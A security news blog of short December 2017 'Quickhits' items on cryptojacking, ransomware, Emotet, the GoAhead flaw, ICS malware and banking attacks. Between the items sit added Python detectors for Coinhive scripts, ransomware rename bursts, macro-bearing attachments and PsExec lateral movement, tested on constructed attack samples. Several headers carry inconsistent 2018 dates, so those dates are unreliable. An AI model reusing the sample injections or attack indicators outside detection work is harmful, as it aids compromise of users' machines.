Quickhits: Friday Dec 29 2017

2018 is wrapping up. Here are a couple of things to watch.

Bitcoin mining: Coinhive malware has been found on the website of Movistar, a major telecom unit owned by Telefónica in Spain. Cryptojackers are using Google Tag Manager to mine the cryptocurrency Monero on hijacked machines. Tag Manager lets marketers, or anyone who runs a website, create tags that inject JavaScript snippets dynamically. Because the mining script isn’t hard-coded in source files on the web server, it doesn’t get detected, and affected users do not know these tags are serving up malware. The good news: most ad blockers and many anti-virus tools can identify and shut down Coin Hive code.

http://www.zdnet.com/article/opera-just-added-a-bitcoin-mining-blocker-to-its-browser/

https://www.theregister.co.uk/2017/11/22/cryptojackers_google_tag_manager_coin_hive/
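The point above is that a GTM-injected miner never appears in the static source on the web server, so a scan has to look at what the browser actually ended up executing. The script below is an added example, not code from the original post: it collects every script a page loads, flags the Coinhive indicators (the coinhive.com/lib/ script path and the CoinHive.Anonymous constructor, which are what the public Coinhive library used, assumed from knowledge of that library rather than from the post), and lists any GTM container ids present. The static source and rendered DOM samples are constructed.

```python
"""Scan page scripts for browser-miner indicators (added example, not from the post).

The indicators are the script path and constructor name the public Coinhive
library used; the GTM container id pattern is the standard GTM-XXXXXXX form.
Sample HTML below is constructed.
"""
import re
from html.parser import HTMLParser

MINER_INDICATORS = {
    "coinhive-lib": re.compile(r"coinhive\.com/lib/", re.I),
    "coinhive-ctor": re.compile(r"CoinHive\.Anonymous\s*\(", re.I),
}
GTM_ID = re.compile(r"\bGTM-[A-Z0-9]{4,}\b")


class ScriptCollector(HTMLParser):
    """Collect external <script src> URLs and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self.inline.append("")

    def handle_data(self, data):
        if self._in_script:
            self.inline[-1] += data

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False


def scan_js(text, origin):
    """Return (origin, indicator) for each miner indicator present in text."""
    return [(origin, name) for name, rx in MINER_INDICATORS.items() if rx.search(text)]


def scan_html(html):
    """Scan HTML for miner indicators and list any GTM container ids it loads.

    Feed this the rendered DOM (what the browser ended up executing), not the
    static source on the web server: a tag injected by GTM is only visible there.
    """
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.external:
        findings += scan_js(src, src)
    for i, body in enumerate(p.inline):
        findings += scan_js(body, f"inline#{i}")
    ids = []
    for s in p.external + p.inline:
        ids += GTM_ID.findall(s)
    return {"findings": findings, "gtm_containers": list(dict.fromkeys(ids))}


# Constructed samples: the static source only carries the GTM loader; the
# rendered DOM shows what the container injected at runtime.
STATIC_SOURCE = """<html><head>
<script>(function(w,d,s,l,i){/* standard GTM loader */})
(window,document,'script','dataLayer','GTM-ABCD123');</script>
</head><body><p>Welcome</p></body></html>"""

RENDERED_DOM = STATIC_SOURCE.replace(
    "</head>",
    '<script src="https://coinhive.com/lib/coinhive.min.js"></script>\n'
    "<script>var m=new CoinHive.Anonymous('SITEKEY-placeholder');m.start();"
    "</script>\n</head>",
)

if __name__ == "__main__":
    print("static  :", scan_html(STATIC_SOURCE))
    print("rendered:", scan_html(RENDERED_DOM))
```

Run against the static source the scanner reports nothing but the container id; run against the rendered DOM it reports both Coinhive indicators. In practice the rendered DOM comes from a headless browser or a saved page from devtools, and the same scan_js function can be pointed at the container JavaScript that googletagmanager.com serves for each id.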

Ransomware Updates: The Tastylock Cryptomix variant has been discovered by Michael Gillespie. It appends “.tastylock” as an extension to encrypted files and changes the contact emails used by the ransomware.

Recommendations to protect your files: keep current, offline backups; use malware detection software that looks for behavioural changes rather than relying on signature detection alone; and scan attachments before you open them, using tools like VirusTotal.

Per Lawrence Abrams

https://www.bleepingcomputer.com/news/security/tastylock-cryptomix-ransomware-variant-released/
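To make the signature-versus-behaviour distinction concrete, here is an added example (not code from the original post or from any product) that runs both kinds of rule over file-rename events of the sort an EDR agent or file-system audit log provides. The signature rule only knows the “.tastylock” extension reported above; the behavioural rule flags any process that changes the extension of many files in a short window, so it also catches a variant nobody has seen yet. The events are constructed.

```python
"""Behavioural vs. signature ransomware detection over file-rename events.

Added example, not from the post. Events are constructed (ts, pid, old, new)
tuples such as an EDR or a file-system audit log would provide; the only
signature used is the ".tastylock" extension the post reports.
"""
import os
from collections import Counter, defaultdict, deque

KNOWN_RANSOM_EXTS = {".tastylock"}  # signature knowledge: only variants already seen


def _ext(path):
    return os.path.splitext(path)[1].lower()


def signature_hits(events):
    """Processes that wrote a file with an extension already known as ransomware."""
    return sorted({pid for _, pid, _, new in events if _ext(new) in KNOWN_RANSOM_EXTS})


def rename_burst(events, threshold=20, window=10.0):
    """Behavioural rule: a process that changes the extension of `threshold` or
    more files to one new extension within `window` seconds, whatever that
    extension is. Returns one (pid, extension, count) alert per process."""
    recent = defaultdict(deque)  # pid -> (ts, new_ext) pairs inside the window
    alerts = {}
    for ts, pid, old, new in sorted(events):
        new_ext = _ext(new)
        if new_ext == _ext(old):
            continue  # ordinary save/overwrite, not an extension change
        q = recent[pid]
        q.append((ts, new_ext))
        while q and ts - q[0][0] > window:
            q.popleft()
        ext, n = Counter(e for _, e in q).most_common(1)[0]
        if n >= threshold and pid not in alerts:
            alerts[pid] = (pid, ext, n)
    return list(alerts.values())


def make_sample():
    """Constructed events: a Tastylock-style run, an unknown-extension run,
    and a benign process renaming a couple of files."""
    ev = []
    for i in range(30):  # known variant: 30 files in 3 seconds
        ev.append((100 + 0.1 * i, 4242, f"docs/doc{i}.docx", f"docs/doc{i}.docx.tastylock"))
    for i in range(30):  # never-seen variant: same behaviour, new extension
        ev.append((200 + 0.1 * i, 5151, f"docs/img{i}.jpg", f"docs/img{i}.jpg.zzz"))
    ev.append((300.0, 777, "out/report.tmp", "out/report.pdf"))  # benign
    ev.append((301.0, 777, "out/slides.tmp", "out/slides.pptx"))
    return ev


if __name__ == "__main__":
    sample = make_sample()
    print("signature:", signature_hits(sample))
    print("behaviour:", rename_burst(sample))
```

The signature rule fires only for the process writing “.tastylock” files; the behavioural rule fires for that process and for the one using an extension it has never seen, and stays quiet for the process that renamed two files. The threshold and window are the tuning knobs; set them from a baseline of how many extension changes legitimate software on the host produces.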

Quickhits: Thursday Dec 21 2017

Emotet Malware Sightings: Emotet originated as a banking trojan and has continued to evolve into more pernicious malware. It goes after banking credentials and sensitive information. Remember, data is the new gold. Typically, the malware is delivered via a malicious macro hidden in an attachment that is very well disguised as a legitimate business communication, such as an invoice. Once Emotet is downloaded it is activated, goes looking for the data to harvest, and then exfiltrates it back to the command and control servers. This follows each step in the Cyber Kill Chain: Recon, Weaponize, Deliver, Exploit, Install, Command and Control, followed by Actions, meaning the attacker’s true intent. In this case, that can involve the sale of information and the continued spread of Emotet across systems to harvest more.


https://www.cylance.com/en_us/blog/threat-spotlight-emotet-infostealer-malware.html
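Since the delivery step above is a macro inside an attachment, the one check worth doing before anyone opens an invoice is whether the document carries a VBA project at all. The following is an added example, not code from the original post or from Cylance: Office Open XML files are zip archives, and a macro-enabled one contains a vbaProject.bin part, so the triage function lists the archive parts and looks for that name. It also notices the older OLE2 container format, which needs a dedicated parser. The sample documents are constructed in memory.

```python
"""Triage an e-mail attachment for an embedded VBA project (added example, not
from the post). Office Open XML files are zip archives; a macro-enabled one
carries a vbaProject.bin part. The sample documents are constructed in memory.
"""
import io
import zipfile

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy .doc/.xls container


def ooxml_parts(data):
    """Part names of an OOXML archive, or None if data is not a zip file."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            return z.namelist()
    except zipfile.BadZipFile:
        return None


def triage_attachment(filename, data):
    """Return a verdict string for an attachment before anyone opens it."""
    parts = ooxml_parts(data)
    if parts is not None:
        has_vba = any(p.lower().endswith("vbaproject.bin") for p in parts)
        ext = filename.lower().rsplit(".", 1)[-1]
        if has_vba and ext in {"docx", "xlsx", "pptx"}:
            # macro part hiding behind an extension that claims to have none
            return "ooxml-macros-behind-non-macro-extension"
        return "ooxml-with-macros" if has_vba else "ooxml-no-macros"
    if data.startswith(OLE2_MAGIC):
        # binary Office format: hand to an OLE parser (e.g. oletools' olevba)
        return "legacy-ole-needs-macro-inspection"
    return "not-an-office-document"


def build_ooxml(with_macro):
    """Constructed minimal Word archive, optionally with a VBA project part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            z.writestr("word/vbaProject.bin", b"\x00placeholder-vba\x00")
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_attachment("invoice.docm", build_ooxml(True)))
    print(triage_attachment("invoice.docx", build_ooxml(False)))
```

A macro is not proof of malice, but an “invoice” that arrives with a VBA project is exactly the thing to hold for a VirusTotal lookup or sandbox run before it reaches a user.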

GoAhead Remote Exploit: This is a biggie. CVE-2017-17562: remote LD_PRELOAD exploitation of the GoAhead web server. Remote exploitation of anything isn’t good, but as it happens GoAhead runs a hell of a lot of things: printers, network gear, CCTV cameras, hosting equipment at telecoms. I took a look on Shodan to see how many connections there are and found over 400K.


Per their website:

GoAhead is the world’s most popular, tiny embedded web server. It is compact, secure and simple to use. GoAhead is deployed in hundreds of millions of devices and is ideal for the smallest of embedded devices.


Welcome to our security nightmare: convenience without proper configuration. This isn’t something new, however; it’s been around a while. And there is a patch here: https://www.elttam.com.au/blog/goahead/

Botnets and Bitcoins: Bitcoin mining has become an issue, given the rapid rise in value of this volatile commodity. Because it takes so much energy to produce this intangible product, miners resort to harnessing other people’s equipment: through sketchy downloads from outside the Apple App Store and Google Play, through malware such as keyloggers, and through botnets. At the moment, organized cybercrime is going after database services using a new botnet in the “Hex-Men” attacks. These are based out of China, and the reach is global. Why you should care: according to GuardiCore researcher Daniel Goldberg, these boxes are sensitive production web servers, running MS SQL, ElasticSearch and the like. Daniel has co-authored a report for GuardiCore on this with Ofri Ziv, who warns:

The fact that they are targeting databases is pretty amazing to me and it’s something that people need to really, really pay more attention to

https://www.darkreading.com/attacks-breaches/new-database-botnet-leveraged-for-bitcoin-mining/d/d-id/1330674

https://www.guardicore.com/2017/12/beware-the-hex-men/

Quickhits: Tuesday Dec. 19 2018

Lexmark Printers: Well, this can’t be good. Apparently there are over a thousand Lexmark printers ready for the taking, due to misconfiguration. They are sitting open and accessible on the public internet. Researchers from NewSky Security reported finding these printers in businesses, universities and government offices. These printers have no passwords, which makes them easy pickings for a variety of attacks. A remote attacker can

“view the printer’s firmware version, ink levels, and network configuration that allows them to enable proxies, change administrator passwords, modify sound volume, contact information, device status, time, and date, create a self-signed certificate and private key and even upload documents and send jobs to the printer.”

Android Malware: We know Android is the choice of attackers everywhere. Recommendations to purchase apps solely through the Google Play Store don’t guarantee safety, but at least they lower the odds of infection. Now there’s a new trojan in town. Loapi hides behind adult content sites or antivirus solutions. The trojan forces users into a loop seeking device administrator privileges. It’s also equipped to defend itself against removal, and blocks attempts to uninstall it. According to Kaspersky, the malware creators

“have implemented almost the entire spectrum of techniques for attacking devices: the Trojan can subscribe users to paid services, send SMS messages to any number, generate traffic and make money from showing advertisements, use the computing power of a device to mine cryptocurrencies, as well as perform a variety of actions on the internet on behalf of the user/device. The only thing missing is user espionage, but the modular architecture of this Trojan means it’s possible to add this sort of functionality at any time.”

Quickhits: Monday Dec 18 2018

New attack on Apache Struts: We’ve seen patches issued in March, May and again this fall for exploits against vulnerabilities in this widespread open source web development framework used to build Java web applications. In this report by F5 Labs, a sophisticated new campaign, “Zealot”, is leveraging the Shadow Brokers exploits EternalBlue and EternalSynergy. Zealot is described as a “highly obfuscated and multi-staged attack”, in keeping with these exploits, and utilizes PowerShell in Windows attacks and Python in Linux attacks. Zealot mines the cryptocurrency Monero, popular amongst cybercriminals.

Potential for Uptick in Iranian-based attacks:  The nuclear deal between Iran and the US seems tenuous at best. There is growing concern that should Trump end things, there will be a corresponding response from Iranian-based hackers. Iranian attacks are state-sponsored, so these won’t be cybercrime cash-grabs, but targeted espionage or worse, damaging attacks against infrastructure, like Shamoon wiperware. And since the attackers do the recon well in advance of the big event, I’d be watching IP addresses and any data exfil carefully.

Banking Trojan Emotet:  There is an increase in banking trojan activity. Malware hunters are sharing reports on new activity for Emotet, which made a resurgence in July this year.  A dedicated group of researchers has been steadily updating and sharing their findings on Pastebin here. 

VirusBulletin and Critical Flaws: VirusBulletin is a very widely used forum for security analysts to test and share malware or suspect findings. Two researchers claim there are critical flaws that have yet to be remediated, and that VirusBulletin has been advised.


Quickhits: Thursday Dec 14 2018

Attacks on ICS: FireEye has identified a new targeted attack on ICS. “Triton” is designed to cause physical damage and harm operations. Thankfully, this latest attack failed, but the lessons and warning are huge. Consider the implications of this against water purification plants, nuclear power plants, or major processing plants that cannot sustain downtime. Triton goes after the SIS, or safety instrumented system, controllers. The FireEye report describes the malware as follows:

TRITON is one of a limited number of publicly identified malicious software families targeted at industrial control systems (ICS). It follows Stuxnet which was used against Iran in 2010 and Industroyer which we believe was deployed by Sandworm Team against Ukraine in 2016. TRITON is consistent with these attacks, in that it could prevent safety mechanisms from executing their intended function, resulting in a physical consequence.


While FireEye cannot attribute the actor, they suggest with some certainty that this is the act of a nation state, and they back it up with this statement:

The attacker targeted the SIS suggesting an interest in causing a high-impact attack with physical consequences. This is an attack objective not typically seen from cyber-crime groups.

New Banking APT: The discovery of a new long-term attack on banks was revealed this week. Dubbed “MoneyTaker”, the group has, according to a report issued by Group-IB Security, taken over $11 million across 18 months from over 20 targets in the UK, Russia and the US, including banks and legal firms. Dmitry Volkov, co-founder of Group-IB and head of intelligence, stated:

“MoneyTaker uses publicly available tools, which makes the attribution and investigation process a non-trivial exercise,” he says. “In addition, incidents occur in different regions worldwide and at least one of the US Banks targeted had documents successfully exfiltrated from their networks, twice. Group-IB specialists expect new thefts in the near future.”

The twist here is that MoneyTaker is leveraging pentesting tools like Metasploit, NirCmd, PsExec, Mimikatz and PowerShell Empire. They used PsExec to propagate across the network, per The Hacker News. The article reports they are also using the Citadel and Kronos banking trojans to deliver a specific point-of-sale (POS) malware known as ScanPOS.

The group has been targeting card processing systems, like the Russian Interbank System AWS CBR and SWIFT, which prompted Group-IB to warn that Latin America is a tempting target because of its broad use of STAR. I’ll be writing more about this as a separate piece. Stay tuned.
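The use of PsExec to propagate is the part of this story a defender can actually hunt for. The script below is an added example, not code from the original post or from Group-IB’s report, and it relies on two facts about PsExec and Windows that are not stated in the post: PsExec installs a temporary service whose default name and binary are PSEXESVC and %SystemRoot%\PSEXESVC.exe, and the Windows System log records every new service as event ID 7045. Rule 1 matches that default name; rule 2 is behavioural and flags the same new service name appearing on several hosts within a short window, which still fires when the service binary has been renamed. The event records are constructed, in the flattened form a SIEM export would give.

```python
"""Spot PsExec-style lateral movement in Windows service-install events.

Added example, not from the post or Group-IB's report. Assumed facts (from
knowledge of PsExec and Windows, not the post): PsExec's default service is
PSEXESVC with binary %SystemRoot%\\PSEXESVC.exe, and the System log records
each new service as event ID 7045. The event records below are constructed.
"""
from collections import defaultdict


def detect_psexec(events, spread_hosts=3, window=600):
    """Return alerts from 7045 records. Rule 1 matches the default PsExec
    service name. Rule 2 is behavioural: the same new service name appearing
    on `spread_hosts` or more machines within `window` seconds, which catches
    a renamed service binary as well."""
    seen = defaultdict(list)  # service name -> [(ts, host)]
    alerts, spread_done = [], set()
    for e in sorted(events, key=lambda r: r["ts"]):
        if e.get("EventID") != 7045:
            continue
        name, path, host = e.get("ServiceName", ""), e.get("ImagePath", ""), e["Computer"]
        if "psexesvc" in (name + " " + path).lower():
            alerts.append(("psexec-default-service", host, name))
        seen[name].append((e["ts"], host))
        hosts = sorted({h for t, h in seen[name] if e["ts"] - t <= window})
        if len(hosts) >= spread_hosts and name not in spread_done:
            spread_done.add(name)
            alerts.append(("service-spread", name, hosts))
    return alerts


def make_sample():
    """Constructed System-log records (EventID 7045 = new service installed)."""
    return [
        {"ts": 1000, "Computer": "WS01", "EventID": 7045, "ServiceName": "PSEXESVC",
         "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
        {"ts": 1030, "Computer": "WS02", "EventID": 7045, "ServiceName": "PSEXESVC",
         "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
        # renamed copy pushed to three hosts within five minutes
        {"ts": 2000, "Computer": "WS03", "EventID": 7045, "ServiceName": "updsvc",
         "ImagePath": r"%SystemRoot%\updsvc.exe"},
        {"ts": 2100, "Computer": "WS04", "EventID": 7045, "ServiceName": "updsvc",
         "ImagePath": r"%SystemRoot%\updsvc.exe"},
        {"ts": 2300, "Computer": "FS01", "EventID": 7045, "ServiceName": "updsvc",
         "ImagePath": r"%SystemRoot%\updsvc.exe"},
        # benign: one host, one ordinary product service; plus non-7045 noise
        {"ts": 2400, "Computer": "WS05", "EventID": 7045, "ServiceName": "VendorAgent",
         "ImagePath": r"C:\Program Files\Vendor\agent.exe"},
        {"ts": 2500, "Computer": "WS05", "EventID": 7036, "ServiceName": "updsvc",
         "ImagePath": ""},
    ]


if __name__ == "__main__":
    for alert in detect_psexec(make_sample()):
        print(alert)
```

On the sample, rule 1 fires twice (the two hosts with the default service name) and rule 2 fires once for the renamed service that landed on three hosts; the single vendor agent install and the non-7045 record produce nothing. Legitimate deployment tooling also installs the same service on many hosts at once, so in production the spread rule wants an allow-list of known deployment service names rather than a lower threshold.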

My First Keynote: Lookout S(h)ecurity Bootcamp Toronto

Lookout Security in Toronto is hosting an exciting event on January 12 2018 for women who are interested in  cybersecurity, and currently in the tech field.  I am honoured to have been asked to be the keynote speaker at this event. This will be my first keynote! I love that this happens with something I really care about: encouraging women in tech, specifically in cybersecurity.

This is what it’s all about.  Encourage learning, growth and opportunity. Events like these grow far beyond the one day they are held, as I can attest from my work with The Diana Initiative. Friendships form, bonds are made, contacts and networking happen. It’s all good!

This is going to be a fantastic and fun day of learning. You had me at reverse engineering! What a great opportunity. Thank you Lookout!